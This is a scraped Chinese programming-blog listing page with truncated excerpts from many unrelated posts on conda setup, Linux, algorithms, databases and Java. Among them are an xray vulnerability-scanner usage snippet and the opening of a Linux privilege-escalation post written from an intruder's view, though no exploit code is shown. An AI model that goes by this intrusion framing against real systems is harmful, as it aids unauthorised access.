一、首先下载Anaconda1.打开网址Indexof/anaconda/archive/|清华大学开源软件镜像站|TsinghuaOpenSourceMirror，滑到最底部，下载Anaconda3-5.3.1-Linux-x86_64.sh。2.使用winscp拖动本地的Anaconda3-5.3.1-Linux-x86_64.sh到服务器的个人工作目录下。二、安装Anaconda软件，创建虚
账户管理命令分析 rxh1234567 笔记
1）useradd作用：创建新账号参数：-d设置用户家目录；-e用YYYYY-MM-DD格式指定一个账户过期日期；-f指定帐户失效日期；-g指定用户登录组的GID或组名；-G指定一个或多个附加组；-m创建用户HOME目录；-M不创建用户家目录；-p为用户账户指定默认密码；-s指定登录shell类型；-u为账户指定一个唯一的UID。2）userdel作用：删除用户参数：-r删除用户与家目录。3）gr
【Python/Java/C++三种语言】20天拿下华为OD笔试之【位运算】2023B-出错的或电路【欧弟算法】全网注释最详细分类最全的华为OD真题闭着眼睛学算法最新华为OD真题 #数学 #位运算算法 python java
文章目录题目描述与示例题目描述输入描述输出描述示例一输入输出说明示例二输入输出说明解题思路代码PythonJavaC++时空复杂度华为OD算法/大厂面试高频题算法练习冲刺训练题目描述与示例题目描述某生产门电路的厂商发现某一批次的或门电路不稳定，具体现象为计算两个二进制数的或操作时，第一个二进制数中某两个比特位会出现交换，交换的比特位置是随机的，但只交换这两个位，其他位不变。很明显，这个交换可能会影
x-ray社区版简单使用教程一只迷茫的汪工具爬虫 web安全
下载地址https://github.com/chaitin/xray注意：xray不开源，直接下载构建的二进制文件即可证书生成./xray_windows_amd64genca使用方法1，使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描（xray的基础爬虫不能处理js渲染的页面）./xray_windows_amd64webscan--basic-crawlerhttp://example.com
C语言学习笔记：内存的五大分区五虎蘸酱 C语言学习笔记 c语言开发语言
在C语言中，进程可在内存中分别存入五大分区：1、text：也称为代码段，其中主要用于存放二进制指令、常量、被const修饰过的初始化过的全局变量、静态局部变量；该分区为只读权限，若强制修改将会产生段错误。2、data：也称为数据段，其中主要用于存放初始化过的全局变量、静态局部变量。3、bss：也称为静态数据段，主要用于存放未初始化过的全局变量、静态局部变量。Ps：该段内存在进程运行前自动清理为04
Percona-toolkit工具详解小一_d28d
1.pt工具安装[root@master~]#yuminstall-ypercona-toolkit-3.1.0-2.el7.x86_64.rpm2.常用工具使用介绍2.1pt-archiver归档表#重要参数--limit100每次取100行数据用pt-archive处理--txn-size100设置100行为一个事务提交一次，--where'id>/root/db/checksum.logpt
linux提权:从入门,Linux提权：从入门到放弃 Kalu丁 linux提权:从入门
日站就要日个彻底。往往我们能拿下服务器的web服务，却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞，也涉及了很多系统配置。一下是我总结的一些提权方法。几点前提已经拿到低权shell被入侵的机器上面有nc，python，perl等linux非常常见的工具有权限上传文件和下载文件内核漏洞提权提到脏牛，运维流下两行眼泪，我们留下两行鼻血。内
菜鸟养成第5集小鹏Running 菜鸟养成记 python
浮点数相加最好不要直接判断，经过round处理后再判断比如在idle设置0.1+0.2==0.3（False）原因是二进制存储导致末尾可能不同，round(0.1+0.2,2)==0.3(True)复数表示法：complexcomplex(1,2)-->1+2j//向左取整-3//2-->-2python所有字符都是以字符串存在的+连接字符串，且只能和字符串类型相加，其他类型会报错，不同类型也不可
程序员技术练级攻略 bo o ya ka 操作系统设计模式 python
转自：http://coolshell.cn/articles/4990.html前言你是否觉得自己从学校毕业的时候只做过小玩具一样的程序？走入职场后哪怕没有什么经验也可以把以下这些课外练习走一遍（朋友的抱怨：学校课程总是从理论出发，作业项目都看不出有什么实际作用，不如从工作中的需求出发）建议：不要乱买书，不要乱追新技术新名词，基础的东西经过很长时间积累而且还会在未来至少10年通用。回顾一下历史，
学习小组Day3笔记--安之若素安之若素_9e53
Conda的安装与初步使用Conda是Linux环境下的软件安装与管理工具相当于应用商店，日常生信使用miniconda即可miniconda的下载与安装从清华镜像下载miniconda3安装包wgethttps://mirrors.tuna.tsinghua.edu.cn/anaconda/miniconda/Miniconda3-latest-Linux-x86_64.sh安装minicond
【软考】希尔排序算法分析王佑辉软考算法算法软考
目录1.c代码2.运行截图3.运行解析1.c代码#include#includevoidshellSort(intdata[],intn){//划分的数组，例如8个数则为[4,2,1]int*delta;intk;//i控制delta的轮次inti;//临时变量，换值inttemp;intdk;intj;k=n;delta=(int*)malloc(sizeof(int)*(n/2));i=0;d
【python】最新版小红书js逆向拿到数据，非常详细教程（附完整代码）景天科技苑爬虫副业实战零基础进阶教学 python js逆向小红书逆向 python爬虫
✨✨欢迎大家来到景天科技苑✨✨养成好习惯，先赞后看哦~作者简介：景天科技苑《头衔》：大厂架构师，华为云开发者社区专家博主，阿里云开发者社区专家博主，CSDN全栈领域优质创作者，掘金优秀博主，51CTO博客专家等。《博客》：Python全栈，前后端开发，人工智能，js逆向，App逆向，网络系统安全，数据分析，Django，fastapi，flask等框架，linux，shell脚本等实操经验，网站搭
python字串节对象Bytes 局外人LZ python python
一、简介字节串（bytes）是二进制数据的一种表示形式。它由一系列的字节组成，每个字节都是一个范围为0-255的整数。字节串可以用来表示二进制数据，例如图像、音频、视频、网络数据等。字节串与字符串（str）类型不同，字符串是由Unicode字符组成的文本数据。而字节串是原始的二进制数据，它不具备字符编码的概念，而是将数据以字节的形式进行存储和处理。在处理二进制数据时，字节串是非常有用的数据类型。它
Dom 周华华 JavaScript html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
【Spark九十六】RDD API之combineByKey bit1129 spark
1. combineByKey函数的运行机制 RDD提供了很多针对元素类型为(K,V)的API，这些API封装在PairRDDFunctions类中，通过Scala隐式转换使用。这些API实现上是借助于combineByKey实现的。combineByKey函数本身也是RDD开放给Spark开发人员使用的API之一首先看一下combineByKey的方法说明：
msyql设置密码报错：ERROR 1372 (HY000): 解决方法详解 daizj mysql 设置密码
MySql给用户设置权限同时指定访问密码时，会提示如下错误： ERROR 1372 (HY000): Password hash should be a 41-digit hexadecimal number；问题原因：你输入的密码是明文。不允许这么输入。解决办法：用select password('你想输入的密码');查询出你的密码对应的字符串，然后
路漫漫其修远兮吾将上下而求索周凡杨学习思索
王国维在他的《人间词话》中曾经概括了为学的三种境界古今之成大事业、大学问者，罔不经过三种之境界。“昨夜西风凋碧树。独上高楼，望尽天涯路。”此第一境界也。“衣带渐宽终不悔，为伊消得人憔悴。”此第二境界也。“众里寻他千百度，蓦然回首，那人却在灯火阑珊处。”此第三境界也。学习技术，这也是你必须经历的三种境界。第一层境界是说，学习的路是漫漫的，你必须做好充分的思想准备，如果半途而废还不如不要开始。这里，注
Hadoop(二)对话单的操作朱辉辉33 hadoop
Debug： 1、 A = LOAD '/user/hue/task.txt' USING PigStorage(' ') AS (col1,col2,col3); DUMP A; //输出结果前几行示例： (>ggsnPDPRecord(21),,) (-->recordType(0),,) (-->networkInitiation(1),,)
web报表工具FineReport常用函数的用法总结（日期和时间函数）老A不折腾 finereport 报表工具 web开发
web报表工具FineReport常用函数的用法总结（日期和时间函数）说明：凡函数中以日期作为参数因子的，其中日期的形式都必须是yy/mm/dd。而且必须用英文环境下双引号(" ")引用。 DATE DATE(year,month,day):返回一个表示某一特定日期的系列数。 Year:代表年，可为一到四位数。 Month:代表月份。
c++ 宏定义中的##操作符墙头上一根草 C++
#与##在宏定义中的--宏展开 #include <stdio.h> #define f(a,b) a##b #define g(a) #a #define h(a) g(a) int main() { &nbs
分析Spring源代码之，DI的实现 aijuans spring DI 现源代码
(转) 分析Spring源代码之，DI的实现 2012/1/3 by tony 接着上次的讲，以下这个sample [java] view plain copy print
for循环的进化 alxw4616 JavaScript
// for循环的进化 // 菜鸟 for (var i = 0; i < Things.length ; i++) { // Things[i] } // 老鸟 for (var i = 0, len = Things.length; i < len; i++) { // Things[i] } // 大师 for (var i = Things.le
网络编程Socket和ServerSocket简单的使用百合不是茶网络编程基础 IP地址端口
网络编程;TCP/IP协议网络:实现计算机之间的信息共享,数据资源的交换协议:数据交换需要遵守的一种协议,按照约定的数据格式等写出去端口:用于计算机之间的通信每运行一个程序，系统会分配一个编号给该程序，作为和外界交换数据的唯一标识 0~65535 查看被使用的
JDK1.5 生产消费者 bijian1013 java thread 生产消费者 java多线程
ArrayBlockingQueue：一个由数组支持的有界阻塞队列。此队列按 FIFO（先进先出）原则对元素进行排序。队列的头部是在队列中存在时间最长的元素。队列的尾部是在队列中存在时间最短的元素。新元素插入到队列的尾部，队列检索操作则是从队列头部开始获得元素。 ArrayBlockingQueue的常用方法：
JAVA版身份证获取性别、出生日期及年龄 bijian1013 java 性别出生日期年龄
工作中需要根据身份证获取性别、出生日期及年龄，且要还要支持15位长度的身份证号码，网上搜索了一下，经过测试好像多少存在点问题，干脆自已写一个。 CertificateNo.java package com.bijian.study; import java.util.Calendar; import
【Java范型六】范型与枚举 bit1129 java
首先，枚举类型的定义不能带有类型参数，所以，不能把枚举类型定义为范型枚举类，例如下面的枚举类定义是有编译错的 public enum EnumGenerics<T> { //编译错，提示枚举不能带有范型参数 OK, ERROR; public <T> T get(T type) { return null;
【Nginx五】Nginx常用日志格式含义 bit1129 nginx
1. log_format 1.1 log_format指令用于指定日志的格式，格式： log_format name(格式名称) type(格式样式) 1.2 如下是一个常用的Nginx日志格式： log_format main '[$time_local]|$request_time|$status|$body_bytes
Lua 语言 15 分钟快速入门 ronin47 lua 基础
- - 单行注释 - - [[ [多行注释] - - ]] - - - - - - - - - - - 1. 变量 & 控制流 - - - - - - - - - - num = 23 - - 数字都是双精度 str = 'aspythonstring'
java-35.求一个矩阵中最大的二维矩阵 ( 元素和最大 ) bylijinnan java
the idea is from: http://blog.csdn.net/zhanxinhang/article/details/6731134 public class MaxSubMatrix { /**see http://blog.csdn.net/zhanxinhang/article/details/6731134 * Q35 求一个矩阵中最大的二维
mongoDB文档型数据库特点开窍的石头 mongoDB文档型数据库特点
MongoDD: 文档型数据库存储的是Bson文档-->json的二进制特点：内部是执行引擎是js解释器，把文档转成Bson结构，在查询时转换成js对象。 mongoDB传统型数据库对比传统类型数据库：结构化数据，定好了表结构后每一个内容符合表结构的。也就是说每一行每一列的数据都是一样的文档型数据库：不用定好数据结构，
[毕业季节]欢迎广大毕业生加入JAVA程序员的行列 comsci java
一年一度的毕业季来临了。。。。。。。。正在投简历的学弟学妹们。。。如果觉得学校推荐的单位和公司不适合自己的兴趣和专业，可以考虑来我们软件行业，做一名职业程序员。。。软件行业的开发工具中，对初学者最友好的就是JAVA语言了，网络上不仅仅有大量的
PHP操作Excel – PHPExcel 基本用法详解 cuiyadll PHP Excel
导出excel属性设置//Include classrequire_once('Classes/PHPExcel.php');require_once('Classes/PHPExcel/Writer/Excel2007.php');$objPHPExcel = new PHPExcel();//Set properties 设置文件属性$objPHPExcel->getProperties
IBM Webshpere MQ Client User Issue (MCAUSER) darrenzhu IBM jms user MQ MCAUSER
IBM MQ JMS Client去连接远端MQ Server的时候，需要提供User和Password吗？答案是根据情况而定，取决于所定义的Channel里面的属性Message channel agent user identifier (MCAUSER)的设置。 http://stackoverflow.com/questions/20209429/how-mca-user-i
网线的接法 dcj3sjt126com
一、PC连HUB (直连线)A端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。 B端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。二、PC连PC （交叉线）A端：(568A)：白绿，绿，白橙，蓝，白蓝，橙，白棕，棕； B端：（标准568B）：白橙，橙，白绿，蓝，白蓝，绿，白棕，棕。三、HUB连HUB&nb
Vimium插件让键盘党像操作Vim一样操作Chrome dcj3sjt126com chrome vim
什么是键盘党？键盘党是指尽可能将所有电脑操作用键盘来完成，而不去动鼠标的人。鼠标应该说是新手们的最爱，很直观，指哪点哪，很听话！不过常常使用电脑的人，如果一直使用鼠标的话，手会发酸，因为操作鼠标的时候，手臂不是在一个自然的状态，臂肌会处于绷紧状态。而使用键盘则双手是放松状态，只有手指在动。而且尽量少的从鼠标移动到键盘来回操作，也省不少事。在chrome里安装 vimium 插件
MongoDB查询（2）——数组查询[六] eksliang mongodb MongoDB查询数组
MongoDB查询数组转载请出自出处：http://eksliang.iteye.com/blog/2177292 一、概述 MongoDB查询数组与查询标量值是一样的，例如，有一个水果列表，如下所示： > db.food.find() { "_id" : "001", "fruits" : [ "苹
cordova读写文件（1） gundumw100 JavaScript Cordova
使用cordova可以很方便的在手机sdcard中读写文件。首先需要安装cordova插件：file 命令为： cordova plugin add org.apache.cordova.file 然后就可以读写文件了，这里我先是写入一个文件，具体的JS代码为： var datas=null;//datas need write var directory=&
HTML5 FormData 进行文件jquery ajax 上传到又拍云 ileson jquery Ajax html5 FormData
html5 新东西：FormData 可以提交二进制数据。页面test.html <!DOCTYPE> <html> <head> <title> formdata file jquery ajax upload</title> </head> <body> <
swift appearanceWhenContainedIn:(version1.2 xcode6.4) 啸笑天 version
swift1.2中没有oc中对应的方法： + (instancetype)appearanceWhenContainedIn:(Class <UIAppearanceContainer>)ContainerClass, ... NS_REQUIRES_NIL_TERMINATION; 解决方法：在swift项目中新建oc类如下： #import &
java实现SMTP邮件服务器 macroli java 编程
电子邮件传递可以由多种协议来实现。目前，在Internet 网上最流行的三种电子邮件协议是SMTP、POP3 和 IMAP，下面分别简单介绍。　　◆ SMTP 协议　　简单邮件传输协议(Simple Mail Transfer Protocol,SMTP)是一个运行在TCP/IP之上的协议，用它发送和接收电子邮件。SMTP 服务器在默认端口25上监听。SMTP客户使用一组简单的、基于文本的
mongodb group by having where 查询sql qiaolevip 每天进步一点点学习永无止境 mongo 纵观千象
SELECT cust_id, SUM(price) as total FROM orders WHERE status = 'A' GROUP BY cust_id HAVING total > 250 db.orders.aggregate( [ { $match: { status: 'A' } }, { $group: {
Struts2 Pojo（六） Luob. POJO strust2
注意：附件中有完整案例 1.采用POJO对象的方法进行赋值和传值 2.web配置 <?xml version="1.0" encoding="UTF-8"?> <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/javaee&q
struts2步骤 wuai struts
1、添加jar包 2、在web.xml中配置过滤器 <filter> <filter-name>struts2</filter-name> <filter-class>org.apache.st

shellcode基础(1)

你可能感兴趣的:(shell,二进制,X86)